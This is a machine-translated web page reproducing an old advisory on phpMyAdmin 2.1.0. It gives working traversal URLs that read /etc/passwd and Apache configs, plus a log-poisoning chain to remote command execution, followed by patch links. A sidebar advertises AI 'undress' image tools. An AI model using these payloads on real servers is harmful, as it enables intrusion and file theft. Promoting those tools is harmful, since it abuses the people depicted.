There are two vulnerabilities in phpMyAdmin2.1.0_PHP Tutorial
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) is a PHP tool for managing MySQL databases, with a WEB-based interface. But it was found to have loopholes. Optionally install the newly released stable version:
phpMyAdmin 2.2.0.
1. Directory traversal vulnerability
The attacker provides the following URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
Can illegally access system files
The problematic code is:
'include ($goto);' in sql.php and in tbl_replace.php.
2. Attacker code execution vulnerability
By using globally writable log files, an attacker can execute arbitrary code on the affected server.
First, get the Apache configuration file so you know where the log files are stored:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php ?goto=/etc/apache/conf/access.conf&btnDrop=No
As you can see, the log is placed at:
/var/log/httpd/error_log
/var/log/httpd/access_log
Then telnet to port 80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^ ]'.
GET
^]
telnet> quit
Connection closed.
#
After the GET request, the attacker can upload arbitrary PHP code
Now, you can Run the command remotely as Apache user:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20- l%20/
Affected systems:
phpMyAdmin 2.1.0
Solution:
Suggestions:
1. Use phpMyAdmin 2.2.0
http://prdownloads.sourceforge. net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2. Users download and install the patch:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
Excerpted from: 52w.net
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
How to set primary key in phpmyadmin
Apr 07, 2024 pm 02:54 PM
The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.
How to add foreign keys in phpmyadmin
Apr 07, 2024 pm 02:36 PM
Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.
Where does the wordpress database exist?
Apr 15, 2024 pm 10:39 PM
The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.
How to delete data table in phpmyadmin
Apr 07, 2024 pm 03:00 PM
Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.
What kind of vulnerability does the phpmyadmin vulnerability belong to?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin is susceptible to multiple vulnerabilities, including: 1. SQL injection vulnerability; 2. Cross-site scripting (XSS) vulnerability; 3. Remote code execution (RCE) vulnerability; 4. Local file inclusion (LFI) vulnerability; 5. Information disclosure Vulnerability; 6. Privilege escalation vulnerability.
How to export excel using phpmyadmin
Apr 07, 2024 pm 02:24 PM
Export data to Excel format via phpMyAdmin: After logging in to phpMyAdmin, select the database and table to export. Click the "Export" option and select "Excel" in the "Format" drop-down menu. Choose your own export columns, query options, and other export options. Click the "Dump" button to start the export and download the exported Excel file.
What should I do if navicat cannot connect?
Apr 23, 2024 am 10:00 AM
When Navicat cannot connect, you can try the following solutions in order: Check whether the connection information is correct, such as database name, host name, port number, user name and password. Make sure the database is up and running. Check the firewall rules to confirm that Navicat and related services are not blocked. Try using the ping command to test your network connection. Update Navicat client software to the latest version. Check the server logs for error messages related to failed connections. Try connecting using other database tools to troubleshoot Navicat-specific issues.
How to change the default password of Empire CMS
Apr 16, 2024 pm 03:21 PM
Reset the Empire CMS default password through the following steps: Log in to the database and find the user table. Edit the administrator user (username is admin). Modify the value in the password field. Save the changes and use the new password to log in to the management backend.
